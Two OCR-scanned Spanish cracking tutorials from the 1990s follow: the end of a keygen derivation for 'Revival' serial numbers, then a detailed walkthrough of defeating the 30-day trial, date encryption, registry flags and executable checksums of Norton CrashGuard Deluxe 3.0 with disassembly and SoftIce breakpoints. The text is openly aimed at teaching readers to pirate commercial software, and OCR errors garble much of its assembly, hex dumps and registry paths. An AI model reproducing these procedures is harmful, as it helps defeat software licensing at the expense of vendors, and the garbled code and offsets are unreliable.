dl, ODOh ;¿Es resto(eax/10) = p(4)? 


short loc_40CE76;Salta a flag de error si resto(eax/10) no es p(4) 
byte ptr [esp+30h+var_20], cl;¿Es resto(eax'/100) = p(8)p(9)? 
short loc_40CE76;Salta a flag de error si resto(eax'/100) no es 


eax, 1 ; Ok todo correcto. Flag de éxito activado. 
edi 

esi 

ebx 

esp, 24h 


; CODE XREF: sub_40CD10+63_3 
eax, eax ; Eres un mal chico.Flag de error activado. 
edi 
esi 
ebx 
esp, 24h 


; CODE XREF: sub_40CD10+83_3 
eax, eax ; Eres un mal chico.Flag de error activado. 
edi 
esi 
ebx 
esp, 24h 


Antes de seguir adelante, centremonos en un par de puntos: 


- ¿Habéis descubierto los números mágicos?, sip los hay son 5468h, OAh y 64h. 

- Como es tradición la rutina checkea en este caso la presencia del carácter '-. 

Luego con un poco de paciencia, nuestra búsqueda inicial hubiera tenido sus frutos. 

- Habéis notado la pésima calidad del código. Uso innecesario de variables, instrucciones inútiles, tamaño del código exagerado. Todo esto 


es debido a que se programó en alto nivel, seguramente en C. 

¿Cómo quieren los programadores proteger su software si es de pésima calidad?. Están directamente vendidos (salvo honrosas 
excepciones, por supuesto.) 

- Si andais un poco pegaos de operacones aritméticas y de ensamblador, buscad alguno 

de los fabulosos cursos de ensamblador que hay en la Web. 


Resumamos los momentos más interesantes de la rutina de verificación: 


A) 0040CD26 cmp eax, 52h ; ¿ES P(0) = R? 

B) 0040CD3C cmp eax, 56h ; ¿ES P(1) = V? 
C)0040CD45 cmp byte ptr [esi+7], 2Dh ; ¿ES P(7) = '-'? 

D) 0040CD56 cmp eax, OFh ; ¿Es el tamaño 15? 
E) 0040CD64 ¡Bucle para comprobar que son números p(2)...p(6) 
F) 0040CD84 ¡Bucle para comprobar que son números p(8)...p(14) 
G)0040CDC3 sub al, 13h ; al=p(2)p(3)-19 

H) 0040CDDF lea ebx, [eax-25h] ; ebx=p(5)p(6)-37 

1) 0040CE34 lea eax, [eax+edi+3] ; eax'=(p(5)p(6)- 


37)+(p(10)p(11)p(12)p(13)p (14) 
XOR 21508) + 3 
J) 0040CE3B mov cl, dl ; Ccl=resto(eax'/100) 
K) 0040CE43 lea eax, [eax+edi+3] ; eax=(p(2)p(3)- 
19)+(p(10)p(11)p(12)p(13)p (14) 
XOR 21508) + 3 
L) 0040CE4D cmp dl, O0DOh ;¿Es resto(eax/10) = p(4)? 
M) 0040CE52 cmp byte ptr [esp+30h+var_20], cl;¿Es resto(eax'/100) = p(8)p(9)?. 


Por A),B),C),D),E) y F) sabemos que la password debe de tener este aspecto: 


00 01 02 03 04 05 06 07 08 09 10 11 12 13 14 15 
RVX XX XxX X - X X X X X X X Xx 


Donde x es un número del 0 al 9. 


Despues hay dos bonitas ecuaciones: 


Por H),1),J) y M) 
I) p(8)p(9)=resto( (p(5)p(6)-0x25)+(p(10)p(11)p(12)p(13)p(14) XOR 21508) + 3) / 0x64) 


Por G),K),L) 
11) p(4)=resto ( (p (2)p (3) -0x13)+(p(10)p(11)p(12)p (13)p(14) XOR 21508) + 3) / 0Ox0A) 


Pos ya está. Estas son las ecuaciones de la rutina de verificación, ya se puede implementar nuestro propio Generador de Llaves, que no será 
más que implementar estas dos ecuaciones. 

Estas dos ecuaciones comprueban que la parte derecha sea igual a la parte izquierda (p(S)p(9) y p(4)). Nuestro Generador calculara la 
parte derecha y construirá la parte izquierda de forma adecuada. Se podrían simplificar un poco, pero no lo haré pa no complicar el 
asunto. 


Un posible Generador en C sería algo así como: 


VER CODIGO FUENTE DEL GENERADOR 


Utilizo números aleatorios (random) para generar un número de serie diferente cada vez que se ejecute e programa. Una última curiosidad, donde 
creereis que guarda nuestra pass el programa. Si lanzais el La utilidad regmon (analiza todos los accesos al Registro dels Sistema) con el programa, 
podréis apreciar que se accede a "HKEY_LOCAL_MACHINEISSOFTWARERevivallRevivalN2.0Serial" Poco imaginativo, ¿verdad?. Podéis 
modificar este número para evitar registraos y probad Con nuevas pass. 


Notas para los lectores. 


1.- Los mensajes del tipo "Hazme el crack para ....'*, ''Dime como de crackea....'*, ''Dime donde puedo encontrar...'' son automáticamente 
ignorados. El objetivo de estos artículos es enseñar a crackear no enseñar a ser unos llorones ineptos que sólo saben mendigar. 


2.- Sólo responderé a preguntas teóricas sobre cracks, indicando algunas pistas que faciliten la labor. 


3.- Narices, escribid artículos sobre los programas que crackeeis. 
De nada sirve lo que aprendéis si no lo repartís, se os pudre en el cabeza, palabra. 


4.- Lamento no haber contestado a ciertos mails interesantes. Desde aquí mis excusas. 
5.- Si os ha servido para algo mis artículos, no seáis vagos y mandad un mail indicándomelo. 
Mr.PinK € WKT ( WHISKEY KON TEKILA ) 


Esperamos vuestras opiniones, sugerencias y ensayos en estadoporcino O hotmail.com 
En breve analizaremos tipos de protecciones mucho más interesantes. 


Recordad bebed de la fuente, buscad a +ORC en la red. 


[ Entrada | Documentoz Genéricoz | WKT TEAM Main Site ] 
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MORALEJA 


INTRODUCCION 


¡Saludos Familia! 


Bastante tiempo desde mi último artículo, lo sé, pero ya estamos de vuelta. Nos ocuparemos ahora de las protecciones temporales, veremos un poco 
de teoría y lo aprendido lo aplicaremos al programa Norton CrashGuard Deluxe 3.0 desde dos puntos de vista, el temporal y el de la password pa 


registrarse. 


TIPOS DE PROTECCIONES TEMPORALES. 


Demos un peque repaso a los diferentes esquemas de protección temporal que nos podemos encontrar (recomiendo la lectura del Capítulo 4.1 de 
+0RC) 


- CINDERELLA. El programa funciona durante una cierto periodo de días (digamos 15 días) comenzando desde la fecha de instalación. 


- BEST_BEFORE. El programa funciona durante una cierto período de tiempo independientemente de la fecha de instalación. El programa caduca 
el 30/12/97. 


- COUNTDOWN. El programa funciona sólo durante unos minutos o unos segundos. 


- QUIVER. El programa funciona sólo durante un número determinado de ejecuciones. Realmente no es una protección temporal, pero su esquema 
de protección se parece mucho al de los otros tres tipos. 


UN POCO DE TEORÍA 


Analizemos como funciona una protección temporal. 


Los "inteligentes programadores" ofertan sus productos completos al público con ridículas protecciones. 
Le colocan una fecha de caducidad, pasada la cual, el programa no funciona. Esta idea la utilizan sobretodo las grandes compañías como Micro$oft, 
Corel, o Symantec. 


La idea es distribuir masivamenete sus productos aprovechando los estupendos canales de distribución que ofrecen las revistas de Soft. Una vez 
inundado el mercado, el usuario disfrutará del producto, se acostumbrará a él, hasta que le sea indispensable y tenga que comprarlo a un precio 
desorbitado . Esta táctica no es nueva, sino preguntad a algún camello, o como la CIA distribuyo la heroína entre el Black Power. 


Pensemos un poco. ¿Cómo conoce el programa que ya ha caducado el período de evaluación?. 

Supongamos que tenemos una evaluación e 15 días e instalamos nuestro programa el 1 de febrero. 

Sumando la fecha de instalación (1 Febrero) más el período de prueba se obtiene la fecha de caducidad: 15 febrero (El día en el que lo instalas cuenta 
como día hábil). 

El programa, lo primero que calcula es si la fecha actual es menor o igual que la fecha de caducidad, y en tal caso, se ejecuta normalmente. 

Si es mayor, dará un bonito mensaje ''El período de evaluación ha expirado". 


Una cosa está clara, el programa debe guardar alguna de las dos fechas siguientes (o las dos): 
A - Fecha de Instalación y el período de evaluación. 
B - Fecha de caducidad. 


Lo normal es la opción B. Al instalarse el programa, se calcula la fecha de caducidad y se guarda en algún sitio. Normalmente se guarda en el 
registro del sistema bajo algún nombre estúpido, aunque se puede guardar en el win.ini, system.ini, fichero oculto, o algún fichero que parezca 
inofensivo. Lo cierto es que debe guardarlo. 


Existe una variante, y es que la fecha de caducidad esté dentro del ejecutable. Un ejemplo lo tenemos en la evaluación del Hotmetal 4.0., del tipo 
BEST_BEFORE, que dentro de su ejecutable aparecía 31/12/97. Madre de Mitra, qué estúpidos pueden llegar a ser los zombi-programadores. 
Dependiendo de la pericia del programador la fecha de caducidad puede estar o no encriptada para ocultarla de la vista del usuario y para que sea 
difícil modificarla. Resumiendo, el programa debe guardar la fecha de caducidad y comprobarla al inicio del programa con la fecha actual. 


Ya sabemos de donde saca la fecha de cadudidad, pero, ¿de dónde saca la fecha actual?. Normalmente (el 99% de las veces) se extrae con una 
llamada a la función getlocaltimeo o getsystemtime. Pero se puede extraer viendo la fecha de algún fichero que se modifique periódicamente como el 
system.dat o el bootlog.txt. 


Los puntos de ataque a este esquema son claros: 


- Atacar en el cálculo de la fecha de caducidad. 
En vez de sumar 15 días sumamos 15 siglos. Esta aproximación es difícil por que el cálculo se realiza una única vez, generalmente en la instalación. 


- Modificar la fecha de caducidad. 
Si la fecha está encriptada, necesitaríamos construir un algoritmo de encriptación para la nueva fecha que deseemos introducir. Por lo que en 
general, puede ser complicado. 


- Forzar la caducidad del programa. Se analizan los mensajes que da el programa y a partir de ellos se le sigue la pista hacia atrás. Es una táctica 
muy utilizada. 


- Atacar en la comprobación de la fecha actual y la fecha de caducidad. Simplemente modifica la comprobación para que siempre estemos en el 
período de evaluación. Esta es una opción elegante. 


Alguien podría pensar que si se echa pa trás el reloj de W95, la protección temporal se elimina. Para evitar esta '"'trampilla", los programadores 
colocan código como el siguiente: 


SI está activada la marca de caducidad ENTONCES el programa ha caducado y se finaliza el programa 
DE LO CONTRARIO SI fechaActualfechaCAducidad ENTONCES activar marca de caducidad 


Como veis si os pasais de la fecha de caducidad, se activa una marca que impedirá que se ejecute el programa aunque modifiquéis el reloj. Esta 
marca se guarda en los mismos sitios donde se guarda la fecha de caducidad. 


A veces, la protección temporal queda eliminada introduciendo una palabra clave, por lo que a veces es más rápido atacar por la password. 


Para averiguar el fichero que contiene la protección temporal, se puede usar el Softlce y poner un bpx getlocaltime, o bien una nueva técnica, muy 
útil no sólo para protecciones temporales. 
Veámosla. 


EN BUSCA DE LA FRASE MÁGICA 


Todos los mensajes de un programa, los de error, los de felicitación, los de aviso, no son más que cadenas de caracteres que deben de residir en un 
fichero. Para protecciones temporales es útil buscar mensajes como 'expire', 'demo", 'evaluation'. Si localizamos estos mensajes habremos localizado, 
generalmente, el fichero que contiene la protección y podemos desensamblarlo o pasarle el Softice. Extendiendo esta idea, basta con buscar los 
mensajes 'unregistered', 'register' para localizar el programa con la protección en esquemas por palabra clave. Recomiendo una herramienta 
excelente para buscar cadenas, es el programa sr32.exe, Search € Replace for Win 3x 95/NT, Funduc Software, Inc. (www.funduc.com). Bajáoslo y 
crackearlo, tiene una bonita y sencillota protección del tipo CINDERELLA. 


EL REGISTRO DEL SISTEMA 


El Registro del Sistema no es má que un fichero gigante (system.dat) donde W95 y el esto de los programas dejan sus miserias, osea, sus variables, 
sus parámetros de configuración, su fecha de caducidad, sus marcas de caducidad. Muchos cracks sólo necesitan modificar adecuadamente el 
system.dat Es muy conveniente que le echéis un vistazo, aprenderéis mucho y podréis modificar muchos de los parámetros del Windoze. Para editar 
el registro, se utiliza normalmente el programa regedit.exe que encontrareis en vuestro directorio de Windows. Recomiendo que lo ejecutéis con el 
parámetro /v ,osease, c:1windowsregedit /v 


COMO CRACKEAR Norton CrashGuard Deluxe 3.0 


Objetivo: Norton CrashGuard Deluxe 3.0. 
Versión: 3.0 

Nombre del ejecutable: ncgd3w95.exe 
Website: http://www.symantec.com 
Tamaño del ejecutable: 11.964.671 bytes. 
Tipo de protección: Cinderella. 
Dificultad: Medio. 

Tiempo de crackeo: 2 horas. 
Herramientas: W32dasm8.X, Softlce. 


En esta ocasión, nuestro objetivo es una gran y abominable compañia, la Symantec y uno de sus muchos y abominables producto: Norton 
CrashGuard Deluxe 3.0 Básicamente, el programa consigue, en algunas ocasiones, que las aplicaciones que se cuelgan no bloqueen al Windoze. Cosa 
de agradecer dado el alto índice de siniestralidad de las aplicaciones y del propio Windoze. Además de tener una B.D de información sobre el PC, 
una antivirus ... Se protege con protección temporal CINDERELLA de 30 días. 


PRIMERA EXPLORACIÓN 


Instalamos el programa y antes de finalizar la instalación ya nos pide que nos registremos, mal asunto, quieren cobrar antes de que probemos su 
producto, su codicia de palpa ante incluso de ver el programa. 


Una vez instalado, nos ha metido a escondidas varias cosas: 


- Una DIl con un extraño nombre: 30vfv6vn.sys situada en el raiz de la unidad c: El nombre varía en cada instalación, sólo permanece fijo *fv6vn.sys, 
los 3 primeros caracteres son variables. Sospecho que sólo es un indicador para ver si el programa ya ha sido instalado. 


- Una aplicación en el arranque del Windoze Norton CrashGuard Deluxe Autocheck. Si pulsais CRTL+ALT+SUPR podreis ver la aplicación por dos 
veces con el nombre de checkup Su misión es detectar cualquier cambio en el reloj del sistema para bloquear inmediatamente la aplicación si nos 
pasamos de la fecha de caducidad. 


Además se crean dos directorios Norton CrashGuard y Norton CrashGuard Deluxe y nos aparece un bonito icono en el escritorio del Windoze con 
forma de escudo y con el original nombre de Norton CrashGuard Deluxe. Y si por si fuera poco, dos iconos en la barra de tareas, la aplicación 
propiamemte dicha (escudo gris con una N en azul) y una historia de los cuelges de los programas (un reondel con una marca de verificación). 


Si pulsamos en el icono del escritorio nos aparece una ventana donde nos dice que nos compremos INMEDIATAMENTE la aplicación a un precio 
fabuloso, $45.95, (unas 7.000 pelas) En la parte inferior aparecen el número de días que restan para el programa deje de funcionar. Además 
aparecen unos bonitos botones en los que nos podemos registrar por Internet, probar el producto o cancelar. Si probamos el producto, aparece la 
ventana principal con todas pas opciones. Si elegimos la opción de registro, aparece una pantalla donde introducimos nuestros datos y nuestra tarjeta 
de crédito. 


PRIMERA SORPRESA 


El sistema de pago no es de la propia Symantec, sino de la empresa Release Software Corporation:http://www.releasesoft.com) y su programa 
SalesA gen. Es la primera vez y veo que Symantec no controle todos los aspectos de una aplicación. 


SEGUNDA SORPRESA 


El fichero a estudiar es el Norton CrashGuardicgmain.exe (229.376 bytes) por una simple razón, tiene el único fichero que tiene el icono que el del 
programa principal que aparece en la barra de tareas. Pero, en el mismo directorio aparece un extraño fichero llamado cgmain.dl_ (743.936 bytes). 
Mu raro, una librería aparentemente comprimida (y por tanto no utilizada) con un tamaño más grande que el ejecutable. Por que no está 
descomprimida la librería, ¿quizás por que no estamos registrados? :-) Además aparece un ejecutable llamado cgmaipop.exe , cuyo nombre es mu 
parecido al fichero del programa que estamos analizando cgmain.exe y tiene un icono que tiene las letras RS, que curioso, justo las Iniciales del la 
empresa que dedica a comercializar el producto: Release Software. Si intentamos ejecutar cgmaipop.exe aparece que está preparando el Software. 
PREPARANDO?, ¿es que hay que precalentar los programas antes de instalarlos?. Luego aparece un mensaje de error indicando que no podemos 
ejecutar la aplicación, ¿quizás por que no estamos registrados? :-) 


Por si fuera poco, aparece otro fichero cgmaitky.dll (257.977) con un nombre muy parecido al de la aplicación que queremos estudiar y 
aproximadamente con el mismo tamaño. Y el colmo, en el otro directorio, donde reside el menú de la aplicación Norton CrashGuard 
DeluxelCGDeluxe.exe aparecen los ficheros CGDelpop.exe con el logo RS y CGDeltky.dll. Análogamente para Norton CrashGuard 
Deluxeicheckup.exe (el programa de testeo de la fecha del sistema) CheckUp.dl_,Checktky.dll 


Todo esto huele a chamusquina, seguro que estos ficheros tienen algo que ver a la hora de registrar el programa, y como veremos en la segunda pate 
del artículo, tienen que ver y MUCHO. 


LA APROXIMACIÓN DIFÍCIL 
AL ATAQUEEEEEEEEEEEEEE 


Podríamos analizar esos extraños ficheros que han aparecido, y lo haremos en la segunda parte del artículo. Ahora atacaremos formalmente a 
Norton CrashGuardiegmain.exe para analizar su esquema CINDERELLA de 30 días. 


Desensamblamos el programa con el w32dsam y obtenmos 3.5 MB de fichero. En las funciones importadas encontramos Addr:00045CC8 hint(00F5) 
Name: GetLocalTime . Bien, bien, asi que, aparentemente, está usando la tipica rutina para obtener la fecha del sistema. Si vemos quien la utiliza, 


estaremos en plena rutina de comprobación de fecha: fechaA ctual>fecha de caducidad? 


Solamente aparece la función getlocaltime que es utilizada una vez en el programa(¿por qué lo ponen tan fácil?) 


* Referenced by a CALL at Addresses: 
| :0040D5B4 , :0040DA44 , :0040DD3F'; La rutina es llamada 3 veces 


:0041E200 81ECCC000000 sub esp, 000000CC 
:0041E206 8D442410 lea eax, dword ptr [esp+10] 
:0041E20A 50 push eax 


* Reference To: KERNEL32.GetLocalTime, Ord: 00F5h 


1 

[1:0041E20B FF15BC544400 Call dword ptr [004454BC] 
:0041E211 8D4C2400 lea ecx, dword ptr [espl 
:0041E215 51 push ecx 


|[* Reference To: KERNEL32.GetSystemTime, Ord:0135h 


:0041E216 FF15B8544400 Call dword ptr [004454B8] 


Además aparece la llamada tambien a GetSystemTime. 


Tras la llamada a GetSystemTime los valores de año, mes, día.,.... son extraídos de la pila y guardados en los registros :0041E21 mov dx, word ptr 
[esp+0A] De los registros pasan a unas variables globales :0041E2AA mov dword ptr [0042F7F0], edx 


Recordad, cualquier posición de memoria fija como [0042F7F0], es utilizada como variable global por el programa. Despues se reintroducen en la 
pila el año, el mes, el día.,.... y se llama a la rutina :0041E310 call 00423420. 


En esta rutina es donde se realiza la encriptación de la fecha,al finalizar, devuelve en eax la fecha encriptada y además de guardarse en :0041E323 
mov dword ptr [ecx], eax 


Es más, las tres llamadas a :0041E200 obtendrán en eax la fecha encriptada de vuelta por call 00423420. Nos os voy a aburrir con diciendo como es la 
rutina de encriptación. Simplemente decir que utiliza la siguiente fórmula : 


t=seconds+(secondsMinute*minutes)+(secondsHour*hour)+(secondsDay*day)+ 
(secondsDay*daysMonth[month])+(secondsY ear*(year-1900))+(secondsDay*(((year-1900)-1)/4)); fin=(t+fix Value); 


Siempre es más fácil comparar un número que comparar años, días, meses,... por eso la fecha se transforma en un número. He construido un 
pequeño programa NORTON.EXE en C que realiza todo el proceso de encriptación de la fecha. Este programa esta incluido con la version en 
formato *.doc de este texto. Los fuentes de estos programas puedes bajarlos aqui. 


Bien, lo lógico, es que una vez encriptada la fecha se compruebe con la fecha de caducidad que debe estar encriptada. Si analizamos las tres llamadas 
a :0041E200 tenemos: 


* La llamada desde :0040D5B4, se limita a guardar la fecha encriptada :0040D641 mov dword ptr [esi+000002AC], eax 


1* La llamada desde :0040DA44, :0040DD3F hacen prácticamente lo mismo, mueven la fecha encriptada que estaba en eax a un registro, hacen una 
llamada a call 40DC40 y despues comprueban la fecha encriptada con [edi+00000284] 


En concreto para la llamada desde :0040DD3F 


:0040DD4B mov ebx, eax 

:0040DD62 push ebx 

:0040DD63 call 0040DC40 

:0040DD7B cmp dword ptr [edi+00000284], ebx 
:0040DDBF ja 0040DDE4 


En concreto para la llamada desde :0040DA44 


:0040DA 54 mov edi, eax 

:0040DASF push edi 

:0040DA60 call 0040DC40 

:0040DAB2 cmp dword ptr [ebx+00000284], edi 
:0040DABS ja 0040DACE 


Esto suena a una doble comprobación temporal, serán desconfiados estos chicos. 


¿Pero que hace la llamada a call 0040DC407, para ello cerramos el cgmain.exe: botón derecho sobre el icono de la N y el escudo y exit. Abrimos el 
loader del Softice y seleccionamos Norton CrashGuardicgmain.exe y ponemos un bpx 40DC40 y lanzamos el programa. Aparecemos en el Softice, 
pulsamos F10 y vemos que ha sido llamada desde :40DD63. Cerramos el cgmain.exe otra vez, ponemos el softice un bpx 40DD63 y lanzamos el 
programa y prestamos atención a ebx que es el que contiene la fecha encriptada. 


La llamada a call 0040DC40 simplemente realiza la siguiente comprobación 


:0040DC56 cmp edx, eax; compara fechaAnterior,fechaActual 
:0040DC58 ja 0040DC64; Salta si eres un mal chico. 


fecha Anterior es la fecha encriptada el la que se arrancó por última vez el programa, fechaActual es la fecha encriptada obtenida de :0041E200. Es 
una simple comprobación para ver si hemos echado para atrás el reloj. 


La comprobación 


cmp dword ptr [ebx+00000284], edi; Análogamente cmp dword ptr [edi+00000284], ebx 
ja 0040DACE; Análogamente ja 0040DDE4 Comprueba fechaCaducidad > fechaActual Si es mayor estamos en el período de prueba. 


LA FECHA DE CADUCIDAD 


La pregunta es, ¿de donde se guarda la fecha de caducidad encriptada? .Poniendo un bpr ebx+00000284 ebx+00000284+5 descubrimos que la fecha 
de encriptación se guarda en el registro del sistema y es recuperada por la llamada a la función :40BD89 RegqueryValueEXA. En concreto, se 


guarda en HKEY_CLASSES_ROOTWUItxfilllFormadAMSHAEZDO( write 


En mi caso, el valor de write es: 


01 02 03 04 05 06 07 08 


01 00 00 00 05 B7 FF FF F8 
02 00 00 00 00 00 00 10 00 
03 08 00 00 00 08 00 00 00 
04 00 00 00 06 B3 36 71 Al 
05 FB Or 81 A5 20 80 00 06 


06 B7 9F A9 AO 00 00 00 00 
07 00 00 00 06 B3 36 71 AO 
08 C3 28 00 00 18 00 00 00 
09 00 00 00 00 00 


La fecha de caducidad está en write(5,7) hasta write(6,5) ambos inclusive. Lo curioso, es que la fecha está codificada, por ejemplo si la fecha de 
caducidad es 0034F5F3D6 se guarda en write 0006B79FA9A000. La rutina de encriptación está en :40C0D6 y se basa en la operación or 


:0040C0D6 8A18 mov bl, byte ptr [eax] 
:0040C0D8 8A11 mov dl, byte ptr [ecx] 
:0040C0DA CO0OE305 sh1l b1, 05 

:0040C0DD 48 dec eax 

:0040C0DE COEAO3 shr dl, 03 

:0040C0E1 49 dec ecx 

:0040C0E2 OADA or bl, dl 

:0040C0E4 4E dec esi 

:0040C0E5 885101 mov byte ptr [ecx+01], dl 
:0040C0E8 885901 mov byte ptr [ecx+01], bl 


He creado dos programas DECODE que decodifica el valor de write y CODE que codifica un valor de fecha para introducirlo en write. 


CHECKSUMS PARAINOCOS 


Los puntos de ataque son claros 


1.- Parchear las comprobaciones en el ejecutable. 
2.- Introducir una fecha caducidad en el año 30000. 


1.- Si parcheamos el programa, se produce un error tan gordo que se casca windows. Esto se puede deber a que hemos crackeado mal obien exite un 
checksum. Para salir de dudas, basta con modificar alguna cadena de caracteres del ejecutable original Por ejemplo ''not be run in DOS mode" lo 
pasamos a ''not be RUN in DOS mode", si se casca es que hay un checksum, como en este caso. 


Un checksum es una comprobación para ver si el ejecutable se ha modificado, normalmente se realiza sumando (XOR) los bytes del ejecutable y 
guardando este valor algún sitio (ejecutable, registro del sistema). El programa al arrancar suma (XOR) los bytes del ejecutable actual y comprueba 
la suma con el valor que tenía guardado. Si hay algún problema es que un virus o un cracker ha modificado el programa y esto nunca es bueno para 
el programador. 


En el caso del Norton CrashGuard Deluxe 3.0, el checksum se realiza de otra forma. Os acordais del fichero cgmaitky.dll, si hombre ese que nos 
parecía tan sospechoso. Pos bien, guarda todos los bytes del cgmain.exe encriptados (de ahí que tuvieran un tamaño tan parecido ambos ficheros). La 
rutina de checksum,simplemente consiste en coger de 16 en 16 los bytes del cgmain.exe encriptarlos y ver si son iguales a 16 bytes del fichero 
cgmaitky.dll. Si existe alguna diferencia se produce un error de protección general y se casca todo. 


Para complicarlo todo, las rutinas de comprobación (ver si los 16 bytes del ejecutable son iguales a los 16 bytes del cgmaitky.dll) no están metidas en 
un bucle, sino que estan a lo extenso. Es decir, hay una rutina de comprobación para los 16 primeros bytes, otra disinta para los 16 siguientes. Si 
queremos parchear el checksum, habrá que modificar unas 30 comprobaciones. Es curioso, pero existe un flag que desactiva la llamada al checksum 
:0040862D jne 00408695 si obligamos a saltar siempre, evitamos el checksum. PERO, ¿POR QUE EXISTE UN FLAG PARA EVITAR EL 
CHECKSUM?, ¿es que el programa cgmain.exe va a modificarse? Como veremos más tarde, así ocurrirá. 


2.- Con el programa NORTON se crea la fecha de caducidad que queremos, con el programa CODE se encripta y ya sólo hay que introducir el 
resultado en HKEY_CLASSES_ROOTUItxfilelFormaiMSHAEZDO(C write en las posiciones write(5,7),write(6,5) 
|¡CHECKSUMS HASTA EN LA SOPA 


Cuando la fecha de caducidad ha vencido, el programa deja de funcionar parcialmente, si analizamos el porqué descubrimos que el byte 
[esi+00000568] controla todo el meollo. En concreto, 


Si [esi+00000568] = 02 You cannot Run this Application 

Si [esi+00000568] = 20 Your computer application source has changed 
Si [esi+00000568] = 08 Your free trial period is over 

Si [esi+00000568] = 04 OK 


Pero, ¿¿cómo se rellena este byte?. Siguiendo la pista hacia atrás descubrimos que se carga a partir de 
HKEY_CLASSES_ROOTWUItxfillA Forma MSHAEZDOCVopen 


00 01 02 03 04 05 06 07 1 00 00 00 00 30 00 00 00 2 00 00 00 00 00 00 10 00 3 08 08 00 00 20 00 00 00 4 00 00 00 00 00 00 00 00 


En concreto de write(3,4). Hay que tener cuidado por que está encriptado, así que hay que utilizar el programa DECODE. Osea , si en write(3,4)=20 
indica que al desencriptarlo [esi+00000568]=4. Si write(3,4)=40 la fecha de caducidad ha vencido. 


Si ha pasado la fecha de caducidad y asignamos write(3,4)=20, el programa replica diciendo que hemos trampeado los recursos. ¿QUE PASA 
AQUÍ?. 


Mu facil, HAY UN CHECKSUM en la sección HKEY_CLASSES_ROOTWUItxfilelFormatMSHAEZDOCopen. Estos es paranoico, un checksum en 
el propio registro del sistema. En concreto, el checksum está en write(1,4). Se deja como ejercicio localizar y destruir este checksum. 


LA MISMA PROTECCIÓN EN TODOS SITIOS 


Aunque parezca increíble, los ficheros CGDeluxe.exe y CheckUp.exe tienen exactamente la misma protección que cgmain.exe y además en los 
mismos offset, osea en las mismas direcciones de memoria. Esto es extremadamente extraño, así que adoptaremos otra vía de ataque. 


LA APROXIMACIÓN FÁCIL 
Veamos lo que tenemos: 


- Unos ficheros extraños asociados a los ficheros importantes. Sabemos la función de uno de ellos los *tky.dll sirven de checksum, pero y el resto para 
que sirven? 


- Un flag que desactiva el checksum del ejecutable. 

- Unos misteriosos fichero ejecutables con el logo RS que dicen que tiene que prepara el Sotware. 
Nos centraremos en los ejecutables con los logos RS. 

REUNIENDO LAS PIEZAS 


Para cada utilidad , p.e. CGDeluxe.EXE existe un fichero, CGDeltky.dll, que realiza funciones de checksum (como ya vimos), una librería de un gran 
tamaño , CGDeluxe.dl_,y un ejecutable CGDelpop.exe que ''prepara el Software". 


No hay que ser un lince para darse cuenta que CGDelpop.exe "prepara" de alguna forma CGDeluxe.dl_ para aportar toda la funcionalidad a 
CGDeluxe.EXE. Esta "preparación" sólo se realiza cuando estamos registrados. 


Por tanto, se parte de un archivo ejecutable de un tamaño inferior a la versión completa del programa. Una vez realizado el proceso de compra se 
activa otro ejecutable que convierte la versión de prueba en versión completa . 


Todas las demás utilidades que acompañan al Norton CrashGuard Deluxe tienen el mismo proceso (CheckUP.exe ->Checkpop.exe, Checkup.dl_, 
Checktky.dll) (Cgmaipop.exe ->cgmain.exe, cgmaitky.dll) 


LA COMPRA VIRTUAL 


Nos centraremos en el asistente (CGDeluxe.EXE) de compra que vimos en nuestra ''Primera Aproximación" : Doble click en el escudo con la N que 
hay en el escritorio y al pulsar el botón Buy Now (comprar ahora) aparece el asistente de compra. 


Este será nuestro punto de entrada. Si pensamos un poco observaremos que la aplicación que lanza el proceso de compra debe saber si la compra ha 
tenido éxito o no. Por tanto, será por aquí por donde centremos nuestros esfuerzos . Además debe de anunciar de alguna forma al resto de utilidades 
que la compra ha tenido éxito para que ellas también se ''preparen'' Analizaremos el ejecutable CGDeluxe.exe (que el que se lanza al pulsar el icono 
del escritorio) y observaremos como ''compra”. 


Nada mejor que usar un desensamblador para investigar el programa CGDeluxe.exe (224 Kb). Una vez aparece el listado observamos que hace uso 
de la librería comercial RSAGNT32.DLL (encargada de realizar la compra virtual) y que existen un referencias a funciones tales como SAlnitialize, 
startSalesAgent. Estas van a ser nuestras funciones de aproximación. 


| 
¡Pulsamos en el botón de Imported Functions (Imp Fn) y hacemos doble click en la línea de rsagnt32.startSalesA gent. 


¡Aparecerá en el listado lo siguiente: 


¡* Reference To: rsagnt32.startSalesAgent, Ord:000Eh 


|:00407834 E807F30000 Call 00416B40 Ñf Llamada al asistente 
:00407839 83C408 add esp, 00000008 

:0040783C 66833D0425430000 cmp word ptr [00432504], 0000 
:00407844 742B je 00407871 


Echamos un vistazo hacia arriba y hacia abajo del listado y vemos que nos encontramos en un bloque de código que se encarga de cargar, iniciar, 
ejecutar, terminar el asistente de compra Buscamos donde puede empezar el bloque. Y un poco mas arriba encontramos: 


111111111111 // INICIO DE BLOQUE //////////////// 
* Referenced by a CALL at Address: 
:00406752 fdesde aquí es llamado el bloque del asistente de compra 


:004077B0O A1BO07B4300 mov eax, dword ptr [00437BB0] 
:004077B5 53 push ebx 


* Reference To: rsagnt32.startSalesAgent, Ord:000Eh Ñ£ Aquí hemos comenzado la busqueda 


:00407834 E807F30000 Call 00416B40 Ñf Llamada al asistente 
:00407839 83C408 add esp, 00000008 

:0040783C 66833D0425430000 cmp word ptr [00432504], 0000 

:00407844 742B je 00407871 

:00407846 BFE0A54300 mov edi, 0043A5E0 

:00407878 5F pop edi 

:00407879 5E pop esi 

:0040787A 5B pop ebx 

:0040787B C3 ret 


11111111111 // FIN DE BLOQUE //////////////// 


Ahora una vez que conocemos desde donde hemos llamado al bloque, usamos el menu Goto a Goto Code Location y escribimos el desplazamiento 
406752. Aquí observamos lo siguiente: 


* Possible Reference to String Resource ID=00001: "Turnkexe" 


:00406748 C705C826430001000000 mov dword ptr [004326C8], 00000001 


:00406752 E859100000 call 004077B0 f Entrada en el bloque anterior 
:00406757 66392D04254300 cmp word ptr [00432504], bp 

:0040675E 0F84F4010000 je 00406958 

|:00406764 BF34254300 mov edi, 00432534 


¡'Ummmm.... Aquí ya tenemos una bonita dirección de memoria (variable global) para usar con Softice.Pero antes añadamos la librería 
RSAGNT32.DLL. al la lista de dll que sabe manejar el Softice. 


¡Abrimos el Symbol Loader de Softice y en el menu Edita Softice Initialization SettingsaExports añadimos RSAGNT32.DLL. Abrimos el Symbol 
¡Loader y cargamos (Load) el programa CGDeluxe.exe. Ya en el SoftIce: 


Bpx 406752 


Bpx startSalesA gent 


Pulsamos F5 y cuando aparezca la ventana de "Welcome to Symantec Trialware'" pulsamos sobre el botón ''Buy Now"'. Aparecer en el Softice en el 
primer breakpoint Bpx 406752 


Seguimos ejecutando, paramos en la función startSalesA gent 


